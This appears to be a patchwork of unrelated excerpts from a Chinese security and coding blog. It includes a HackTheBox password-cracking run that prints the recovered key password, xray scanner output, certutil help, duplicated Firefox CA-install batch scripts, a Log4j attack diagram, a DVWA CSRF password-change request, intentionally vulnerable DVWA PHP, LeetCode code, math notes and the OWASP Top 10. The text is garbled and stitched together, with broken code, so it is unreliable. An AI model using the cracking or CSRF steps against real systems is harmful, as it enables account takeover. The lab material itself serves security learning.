┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] └─# john -wordlist=/usr/share/wordlists/rockyou.txt key.hash Using default input encoding: UTF-8 Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64]) Cost 1 (s2k-count) is 65011712 for all loaded hashes Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 7 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status blink182 (Passpie) 1g 0:00:00:02 DONE (2024-09-15 17:48) 0.3937g/s 75.59p/s 75.59c/s 75.59C/s carolina..november Use the "--show" option to display all of the cracked passwords reliably Session completed.
COMMANDS: webscan, ws Run a webscan task servicescan, ss Run a service scan task subdomain, sd Run a subdomain task poclint, pl, lint lint yaml poc burp-gamma, btg Convert the export file of burp historical proxy records to POC format transform transform other script to gamma reverse Run a standalone reverse server convert convert results from json to html or from html to json genca GenerateToFile CA certificate and key upgrade check new version and upgrade self if any updates found version Show version info x A command that enables all plugins. You can customize new commands or modify the plugins enabled by a command in the configuration file. help, h Shows a list of commands or help for one command
GLOBAL OPTIONS: --config FILE Load configuration from FILE (default: "config.yaml") --log-level value Log level, choices are debug, info, warn, error, fatal --help, -h show help [INFO] 2023-09-21 17:36:22 [default:entry.go:226] Loading config file from config.yaml
OPTIONS: --list, -l list plugins --plugins value, --plugin value, --plug value specify the plugins to run, separated by ',' --poc value, -p value specify the poc to run, separated by ',' --level value specify the level of poc to run, separated by ',' --tags value specify the level of poc to run, separated by ','
--listen value use proxy resource collector, value is proxy addr, (example: 127.0.0.1:1111) --basic-crawler value, --basic value use a basic spider to crawl the target and scan the requests --browser-crawler value, --browser value use a browser spider to crawl the target and scan the requests --url-file value, --uf value read urls from a local file and scan these urls, one url per line --burp-file value, --bf value read requests from burpsuite exported file as targets --url value, -u value scan a **single** url --data value, -d value data string to be sent through POST (e.g. 'username=admin') --raw-request FILE, --rr FILE load http raw request from a FILE --force-ssl, --fs force usage of SSL/HTTPS for raw-request
--json-output FILE, --jo FILE output xray results to FILE in json format --html-output FILE, --ho FILE output xray result to FILE in HTML format --webhook-output value, --wo value post xray result to url in json format
[INFO] 2023-09-21 17:03:17 [default:entry.go:226] Loading config file from config.yaml
Enabled plugins: [phantasm]
[INFO] 2023-09-21 17:03:18 [phantasm:phantasm.go:114] found local poc .\POC\yaml-poc-fit2cloud-jumpserver-unauthorized_access-CVE-2023-42442.yml [INFO] 2023-09-21 17:03:18 [phantasm:phantasm.go:185] 1 pocs have been loaded (debug level will show more details) [INFO] 2023-09-21 17:03:18 [default:dispatcher.go:444] processing GET http://example.com/ [Vuln: phantasm] Target "http://example.com/" VulnType "poc-yaml-jumpserver-session-replay-unauth/default" Author "Chaitin" Links ["https://stack.chaitin.com/techblog/detail/156"]
[*] All pending requests have been scanned [*] scanned: 1, pending: 0, requestSent: 2, latency: 40.50ms, failedRatio: 0.00% [INFO] 2023-09-21 17:03:19 [controller:dispatcher.go:573] controller released, task done
C:\Users\h4m5t\Downloads\nss-3.11\nss-3.11\bin>certutil.exe -H -A Add a certificate to the database (create if needed) -E Add an Email certificate to the database (create if needed) -n cert-name Specify the nickname of the certificate to add -t trustargs Set the certificate trust attributes: p valid peer P trusted peer (implies p) c valid CA T trusted CA to issue client certs (implies c) C trusted CA to issue server certs (implies c) u user cert w send warning g make step-up cert -f pwfile Specify the password file -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -a The input certificate is encoded in ASCII (RFC1113) -i input Specify the certificate file (default is stdin)
-C Create a new binary certificate from a BINARY cert request -c issuer-name The nickname of the issuer cert -i cert-request The BINARY certificate request file -o output-cert Output binary cert to this file (default is stdout) -x Self sign -m serial-number Cert serial number -w warp-months Time Warp -v months-valid Months valid (default is 3) -f pwfile Specify the password file -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -1 Create key usage extension -2 Create basic constraint extension -3 Create authority key ID extension -4 Create crl distribution point extension -5 Create netscape cert type extension -6 Create extended key usage extension -7 Create an email subject alt name extension -8 Create an dns subject alt name extension
-G Generate a new key pair -h token-name Name of token in which to generate key (default is internal) -k key-type Type of key pair to generate ("dsa", "rsa" (default)) -g key-size Key size in bits, (min 512, max 2048, default 1024) -y exp Set the public exponent value (3, 17, 65537) (rsa only) -f password-file Specify the password file -z noisefile Specify the noise file to be used -q pqgfile read PQG value from pqgfile (dsa only) -d keydir Key database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix
-D Delete a certificate from the database -n cert-name The nickname of the cert to delete -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix
-U List all modules -d moddir Module database directory (default is '~/.netscape') -P dbprefix Cert & Key database prefix -X force the database to open R/W
-K List all keys -h token-name Name of token in which to look for keys (default is internal, use "all" to list keys on all tokens) -k key-type Type of key pair to list ("all", "dsa", "rsa" (default)) -f password-file Specify the password file -d keydir Key database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -X force the database to open R/W
-L List all certs, or print out a single named cert -n cert-name Pretty print named cert (list all if unspecified) -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -X force the database to open R/W -r For single cert, print binary DER encoding -a For single cert, print ASCII encoding (RFC1113)
-M Modify trust attributes of certificate -n cert-name The nickname of the cert to modify -t trustargs Set the certificate trust attributes (see -A above) -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix
-N Create a new certificate database -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix
-T Reset the Key database or token -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -h token-name Token to reset (default is internal)
-O Print the chain of a certificate -n cert-name The nickname of the cert to modify -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -X force the database to open R/W
-R Generate a certificate request (stdout) -s subject Specify the subject name (using RFC1485) -o output-req Output the cert request to this file -k key-type Type of key pair to generate ("dsa", "rsa" (default)) -h token-name Name of token in which to generate key (default is internal) -g key-size Key size in bits, RSA keys only (min 512, max 2048, default 1024) -q pqgfile Name of file containing PQG parameters (dsa only) -f pwfile Specify the password file -d keydir Key database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -p phone Specify the contact phone number ("123-456-7890") -a Output the cert request in ASCII (RFC1113); default is binary
-V Validate a certificate -n cert-name The nickname of the cert to Validate -b time validity time ("YYMMDDHHMMSS[+HHMM|-HHMM|Z]") -e Check certificate signature -u certusage Specify certificate usage: C SSL Client V SSL Server S Email signer R Email Recipient -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -X force the database to open R/W
-S Make a certificate and add to database -n key-name Specify the nickname of the cert -s subject Specify the subject name (using RFC1485) -c issuer-name The nickname of the issuer cert -t trustargs Set the certificate trust attributes (see -A above) -k key-type Type of key pair to generate ("dsa", "rsa" (default)) -h token-name Name of token in which to generate key (default is internal) -g key-size Key size in bits, RSA keys only (min 512, max 2048, default 1024) -q pqgfile Name of file containing PQG parameters (dsa only) -x Self sign -m serial-number Cert serial number -w warp-months Time Warp -v months-valid Months valid (default is 3) -f pwfile Specify the password file -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -p phone Specify the contact phone number ("123-456-7890") -1 Create key usage extension -2 Create basic constraint extension -3 Create authority key ID extension -4 Create crl distribution point extension -5 Create netscape cert type extension -6 Create extended key usage extension -7 Create an email subject alt name extension -8 Create an dns subject alt name extension
@echo off ::开启变量延迟扩展 setlocal EnableExtensions EnableDelayedExpansion
echo ###checking new_version### echo -------------------------- set regPath1="HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox" set regPath2="HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox" set regKey="CurrentVersion" set regValue=""
set Value1="checkversion"
rem 检查新版本注册表是否存在 reg query %regPath1% >nul 2>nul echo %errorlevel% echo !errorlevel! if %errorlevel%==0 ( echo new_version Registry key %regkey% exists. for /f "tokens=2*" %%a in ('reg query %regPath1% /v %regKey% ^| findstr /i %regKey%') do ( if "%regValue%"=="" ( echo value not exists ) else ( set Value1=%%b ) ) ) else ( echo new_version Registry key %regkey% does not exist. echo -------------------------- ::检查旧版本注册表路径是否存在 echo ###checking old_version### reg query %regPath2% >nul 2>nul if !errorlevel!==0 ( echo old_version Registry key %regkey% exists. for /f "tokens=2*" %%a in ('reg query %regPath2% /v %regKey% ^| findstr /i %regKey%') do ( if "%regValue%"=="" ( echo value not exists ) else ( set Value1=%%b ) ) ) else ( echo old_version Registry key %regkey% does not exist. set Value1=0.0.0 )
echo !Value1! echo %Value1%
set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%" echo Majorold: %Major% )
echo !Value1! echo %Value1%
set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%" echo Majornew: %Major%
rem 检查版本号 if %final_version% EQU 0 ( echo Program version is 0. Exiting script... exit /b 1 ) else if %Major% LSS 49 ( call :function1 ) else ( call :function2 )
rem 退出脚本 exit /b
:: :function1 echo Program version is less than 49. Executing function 1... rem 执行函数1的代码,在49版本以下,更新cert8.db证书库。
::显示db中的现有证书 set "db_path=%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\" set default_name="" ::判断证书数据库路径是否存在 IF EXIST %db_path% ( echo default_path exists rem 在这里添加需要执行的命令 set "count=0" for /d %%i in ("%db_path%\*") do ( set /a count+=1 set "folder=%%~nxi" ) ::判断是否只有*.default这一个文件夹 if !count! equ 1 ( set default_name=!folder! set "all_path=%db_path%!default_name!" ::显示default文件夹全路径 echo !all_path! ::显示更新前证书库 C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path! ::更新证书库 C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -A -n "SomeNametest" -t "u,u,u" -i "C:\firefoxinstallcert\TPLINKCA.cer" -d !all_path! ::显示更新后的证书库 C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path! ) else ( echo no or more ) ) ELSE ( echo no )
goto :eof
:function2 echo Program version is greater than or equal to 49. Executing function 2... rem 执行函数2的代码,在49版本以上的FireFox中启用security.enterprise_roots.enabled
set source_file_cfg=C:\firefoxinstallcert\ddwi.cfg set "dest_dir_cfg=C:\Program Files\Mozilla Firefox\" echo Moving %source_file_cfg% to %dest_dir_cfg%... if exist "%source_file_cfg%" ( if exist "%dest_dir_cfg%" ( copy "%source_file_cfg%" "%dest_dir_cfg%" ) else ( echo Directory %dest_dir_cfg% does not exist! Cannot move file. ) ) else ( echo Source file %source_file_cfg% does not exist! Cannot move file. )
set "dest_dir_cfg_x86=C:\Program Files (x86)\Mozilla Firefox\" echo Moving %source_file_cfg% to %dest_dir_cfg_x86%... if exist "%source_file_cfg%" ( if exist "%dest_dir_cfg_x86%" ( copy "%source_file_cfg%" "%dest_dir_cfg_x86%" ) else ( echo Directory does not exist! Cannot move file. ) ) else ( echo Source file %source_file_cfg% does not exist! Cannot move file. )
set source_file_js=C:\firefoxinstallcert\local-settings.js set "dest_dir_js=C:\Program Files\Mozilla Firefox\defaults\pref\" echo Moving %source_file_js% to %dest_dir_js%... if exist "%source_file_js%" ( if exist "%dest_dir_js%" ( copy "%source_file_js%" "%dest_dir_js%" ) else ( echo Directory does not exist! Cannot move file. ) ) else ( echo Source file %source_file_js% does not exist! Cannot move file. ) set "dest_dir_js_x86=C:\Program Files (x86)\Mozilla Firefox\defaults\pref\" echo Moving %source_file_js% to %dest_dir_js_x86%... if exist "%source_file_js%" ( if exist "%dest_dir_js_x86%" ( copy "%source_file_js%" "%dest_dir_js_x86%" ) else ( echo Directory does not exist! Cannot move file. ) ) else ( echo Source file %source_file_js% does not exist! Cannot move file. )
@echo off ::开启变量延迟扩展 setlocal EnableExtensions EnableDelayedExpansion
echo ###checking new_version### echo -------------------------- set regPath1="HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox" set regPath2="HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox" set regKey="CurrentVersion" set regValue=""
set Value1="checkversion"
rem 检查新版本注册表是否存在 reg query %regPath1% >nul 2>nul echo %errorlevel% echo !errorlevel! if %errorlevel%==0 ( echo new_version Registry key %regkey% exists. for /f "tokens=2*" %%a in ('reg query %regPath1% /v %regKey% ^| findstr /i %regKey%') do ( if "%regValue%"=="" ( echo value not exists ) else ( set Value1=%%b ) ) ) else ( echo new_version Registry key %regkey% does not exist. echo -------------------------- ::检查旧版本注册表路径是否存在 echo ###checking old_version### reg query %regPath2% >nul 2>nul if !errorlevel!==0 ( echo old_version Registry key %regkey% exists. for /f "tokens=2*" %%a in ('reg query %regPath2% /v %regKey% ^| findstr /i %regKey%') do ( if "%regValue%"=="" ( echo value not exists ) else ( set Value1=%%b ) ) ) else ( echo old_version Registry key %regkey% does not exist. set Value1=0.0.0 )
echo !Value1! echo %Value1%
set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%" echo Majorold: %Major% )
echo !Value1! echo %Value1%
set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%" echo Majornew: %Major%
rem 检查版本号 if %final_version% EQU 0 ( echo Program version is 0. Exiting script... exit /b 1 ) else if %Major% LSS 49 ( call :function1 ) else ( call :function2 )
rem 退出脚本 exit /b
:: :function1 echo Program version is less than 49. Executing function 1... rem 执行函数1的代码,在49版本以下,更新cert8.db证书库。
::显示db中的现有证书 set "db_path=%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\" set default_name="" ::判断证书数据库路径是否存在 IF EXIST %db_path% ( echo default_path exists rem 在这里添加需要执行的命令 set "count=0" for /d %%i in ("%db_path%\*") do ( set /a count+=1 set "folder=%%~nxi" ) ::判断是否只有*.default这一个文件夹 if !count! equ 1 ( set default_name=!folder! set "all_path=%db_path%!default_name!" ::显示default文件夹全路径 echo !all_path! ::显示更新前证书库 C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path! ::更新证书库 C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -A -n "SomeNametest" -t "u,u,u" -i "C:\firefoxinstallcert\TPLINKCA.cer" -d !all_path! ::显示更新后的证书库 C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path! ) else ( echo no or more ) ) ELSE ( echo no )
goto :eof
:function2 echo Program version is greater than or equal to 49. Executing function 2... rem 执行函数2的代码,在49版本以上的FireFox中通过增加user.js配置文件启用security.enterprise_roots.enabled
::profiles默认配置文件目录 set "parentFolder=%APPDATA%\Mozilla\Firefox\Profiles" ::搜索存在default字符串的文件夹,即profiles配置文件夹 set "searchString=default" set source_user_js=C:\firefoxinstallcert\user.js ::将user.js文件拷贝到配置文件目录
IF EXIST %parentFolder% ( for /d %%F in ("%parentFolder%\*") do ( echo "%%~nxF" | findstr /C:"%searchString%" >nul 2>&1 if errorlevel 1 ( echo default Folder not found. ) else ( echo default Folder found. rem 拼接全路径 set "all_default_path=%parentFolder%\%%~nxF" echo !all_default_path! copy "%source_user_js%" !all_default_path! ) ) ) ELSE ( echo no ) goto :eof pause
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.
<pre class="mermaid">graph LR A[Attacker crafts<br>malicious payload<br>with JNDI lookup] --> C{Log4j parses:<br>Contains JNDI lookup?} C -->|Yes| D[Execute<br>JNDI lookup] C -->|No| E[Normal log] D --> F[Connect to<br>attacker's server] F --> G[Download &<br>execute<br>malicious class] G --> H[Attacker gains<br>server control] classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px; classDef highlight fill:#f9d5e5,stroke:#333,stroke-width:2px; classDef decision fill:#e3f2fd,stroke:#333,stroke-width:1px; classDef danger fill:#ffebee,stroke:#333,stroke-width:1px; class A,H highlight; class C decision; class G danger;</pre>
graph LR A[Attacker crafts malicious payload with JNDI lookup] --> C{Log4j parses: Contains JNDI lookup?} C -->|Yes| D[Execute JNDI lookup] C -->|No| E[Normal log] D --> F[Connect to attacker's server] F --> G[Download & execute malicious class] G --> H[Attacker gains server control] classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px; classDef highlight fill:#f9d5e5,stroke:#333,stroke-width:2px; classDef decision fill:#e3f2fd,stroke:#333,stroke-width:1px; classDef danger fill:#ffebee,stroke:#333,stroke-width:1px; class A,H highlight; class C decision; class G danger;
sequenceDiagram前端->>前端: 用户首次打开前端页面前端->>后台: version : 0 请求同步数据后台->>前端: 返回数据,同时携带最大的versionnote right of 后台: 返回数据结构:{"version":100, data:[{},{},{}]}
SQL, HTML, iFrame, SSI, OS Command, XML, XPath, LDAP and SMTP injections Blind SQL and Blind OS Command injection Bash Shellshock (CGI) and Heartbleed vulnerability (OpenSSL) Cross-Site Scripting (XSS) and Cross-Site Tracing (XST) Cross-Site Request Forgery (CSRF) AJAX and Web Services vulnerabilities (JSON/XML/SOAP/WSDL) Malicious, unrestricted file uploads and backdoor files Authentication, authorization and session management issues Arbitrary file access and directory traversals Local and remote file inclusions (LFI/RFI) Configuration issues: Man-in-the-Middle, cross-domain policy files, information disclosures,... HTTP parameter pollution and HTTP response splitting Denial-of-Service (DoS) attacks: Slow HTTP and XML Entity Expansion Insecure distcc, FTP, NTP, Samba, SNMP, VNC, WebDAV configurations HTML5 ClickJacking, Cross-Origin Resource Sharing (CORS) and web storage issues Unvalidated redirects and forwards, and cookie poisoning Cookie poisoning and insecure cryptographic storage Server Side Request Forgery (SSRF) XML External Entity attacks (XXE) And much much much more…
// Checks to see where the request came from if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) { // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf' ];
对referer进行了检查
1 2 3 4 5 6 7 8 9
GET /vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change HTTP/1.1 Host: 49.232.78.252:81 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Connection: close Referer: http://49.232.78.252:81/vulnerabilities/csrf/ Cookie: PHPSESSID=9mjbjlhio6pup4mq4ne932fbo2; security=medium Upgrade-Insecure-Requests: 1
// Is it an image? if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) && ( $uploaded_size < 100000 ) ) {
// Can we move the file to the upload folder? if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { // No echo'<pre>Your image was not uploaded.</pre>'; } else { // Yes! echo"<pre>{$target_path} succesfully uploaded!</pre>"; } } else { // Invalid file echo'<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; } }
// Check CAPTCHA from 3rd party $resp = recaptcha_check_answer( $_DVWA[ 'recaptcha_private_key'], $_POST['g-recaptcha-response'] );
// Did the CAPTCHA fail? if( !$resp ) { // What happens when the CAPTCHA was entered incorrectly $html .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>"; $hide_form = false; return; } else { // CAPTCHA was correct. Do both new passwords match? if( $pass_new == $pass_conf ) { // Show next stage for the user echo" <pre><br />You passed the CAPTCHA! Click the button to confirm your changes.<br /></pre> <form action=\"#\" method=\"POST\"> <input type=\"hidden\" name=\"step\" value=\"2\" /> <input type=\"hidden\" name=\"password_new\" value=\"{$pass_new}\" /> <input type=\"hidden\" name=\"password_conf\" value=\"{$pass_conf}\" /> <input type=\"submit\" name=\"Change\" value=\"Change\" /> </form>"; } else { // Both new passwords do not match. $html .= "<pre>Both passwords must match.</pre>"; $hide_form = false; } } }
// Check to see if both password match if( $pass_new == $pass_conf ) { // They do! $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); $pass_new = md5( $pass_new );
// Feedback for the end user echo"<pre>Password Changed.</pre>"; } else { // Issue with the passwords matching echo"<pre>Passwords did not match.</pre>"; $hide_form = false; }
?> <?php if (isset ($_POST['include'])) { $page[ 'body' ] .= " " . $_POST['include'] . " "; } $page[ 'body' ] .= ' <form name="csp" method="POST"> <p>Whatever you enter here gets dropped directly into the page, see if you can get an alert box to pop up.</p> <input size="50" type="text" name="include" value="" id="include" /> <input type="submit" value="Include" /> </form> ';
递归方法 classSolution: defspiralOrder(self, matrix: List[List[int]]) -> List[int]: m=len(matrix) if m==0orlen(matrix[0])==0: return [] n=len(matrix[0]) newlist=matrix[0] if m>1:
for i inrange(1,m): newlist.append(matrix[i][n-1])
for j inrange(n-2,-1,-1): newlist.append(matrix[m-1][j]) if n>1: for i inrange(n-2,0,-1): newlist.append(matrix[i][0]) M=[] for k inrange(1,m-1): t=matrix[k][1:-1] M.append(t)
思路清晰方法: classSolution: defspiralOrder(self, matrix: List[List[int]]) -> List[int]: res=[] iflen(matrix)==0: return [] #定义四个边界点 left=0 right=len(matrix[0])-1 top=0 bottom=len(matrix)-1 #在不超过边界的条件下,进行一轮循环 while (top<bottom and left<right): for i inrange(left,right): res.append(matrix[top][i]) for i inrange(top,bottom): res.append(matrix[i][right]) for i inrange(right,left,-1): res.append(matrix[bottom][i]) for i inrange(bottom,top,-1): res.append(matrix[i][left]) left+=1 top+=1 right-=1 bottom-=1 #如果剩余1行或1列:left=0 right1 if top==bottom: for i inrange(left,right+1): res.append(matrix[top][i]) elif left==right: for i inrange(top,bottom+1): res.append(matrix[i][left]) return res
任何多项式可以写为:f(x)=q(x)g(x)+r(x) r(x)称为余式 r(x)=f(x) mod g(x)
若不存在余式,则称g(x)整除f(x),g(x)|f(x)
若f(x)除了它本身和1外,不存在其它因式,则称f(x)是不可约多项式,或既约多项式、素多项式
系数在GF(p)中,以素多项式取模的多项式构成一个域
欧几里得算法
1 2 3 4 5 6 7
a可以表示成a = kb + r(a,b,k,r皆为正整数,且r<b),则r = a mod b 假设d是a,b的一个公约数,记作d|a,d|b,即a和b都可以被d整除。 而r = a - kb,两边同时除以d,r/d=a/d-kb/d=m,由等式右边可知m为整数,因此d|r 因此d也是b,a mod b的公约数 假设d是b,a mod b的公约数, 则d|b,d|(a-k*b),k是一个整数, 进而d|a.因此d也是a,b的公约数 因此(a,b)和(b,a mod b)的公约数是一样的,其最大公约数也必然相等,得证。
1 2 3 4 5
对于任何可以整除a和b的整数,那么它也一定能整除a-b(和b),因此我们选择该整数(前面提到的任何整数)为gcd(a,b),它一定比a-b和b的最大公约数小:gcd(a,b)<=gcd(a-b,b) 同理,任何可以整除a-b和b的整数,一定可以整除a和b,因此我们选择该整数为gcd(a-b,b),它一定比a和b的最大公约数小:gcd(a-b,b)<=gcd(a,b) 由此可知:gcd(a,b)=gcd(a-b,b) 因为总有整数n,使得 a - n*b = a mod b, 所以迭代可知:gcd(a-b,b)=gcd(a-2b,b)=...=gcd(a-n*b,b)=gcd(a mod b,b)
JSFuck is an esoteric and educational programming style based on the atomic parts of JavaScript. It uses only six different characters to write and execute code.
It does not depend on a browser, so you can even run it on Node.js.
Use the form below to convert your own script. Uncheck “eval source” to get back a plain string.
Given an array nums of n integers, are there elements a, b, c in nums such that a + b + c = 0? Find all unique triplets in the array which gives the sum of zero.
Notice that the solution set must not contain duplicate triplets.
parser.add_argument("--square", help="display a square of a given number", type=int) parser.add_argument("--cubic", help="display a cubic of a given number", type=int)
%% extract watermark FA2=fft2(FAO); G=(FA2-FA)/alpha; GG=G; fori=1:imsize(1)*0.5 forj=1:imsize(2) GG(M(i),N(j),:)=G(i,j,:); end end fori=1:imsize(1)*0.5 forj=1:imsize(2) GG(imsize(1)+1-i,imsize(2)+1-j,:)=GG(i,j,:); end end figure,imshow(GG);title('extracted watermark'); %imwrite(uint8(GG),'extracted watermark.jpg');
The OWASP Top 10 is a standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications.
注入
失效的身份验证
敏感信息泄露
XML外部实体(XXE)
失效的访问控制
安全配置错误
跨站脚本(XSS)
不安全的反序列化
使用含有已知漏洞的组件
不足的日志记录和监控
Injection. Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
Broken Authentication. Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities temporarily or permanently.
Sensitive Data Exposure. Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data may be compromised without extra protection, such as encryption at rest or in transit, and requires special precautions when exchanged with the browser.
XML External Entities (XXE). Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks.
Broken Access Control. Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users’ accounts, view sensitive files, modify other users’ data, change access rights, etc.
Security Misconfiguration. Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only must all operating systems, frameworks, libraries, and applications be securely configured, but they must be patched/upgraded in a timely fashion.
Cross-Site Scripting (XSS). XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
Insecure Deserialization. Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.
Using Components with Known Vulnerabilities. Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.
Insufficient Logging & Monitoring. Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.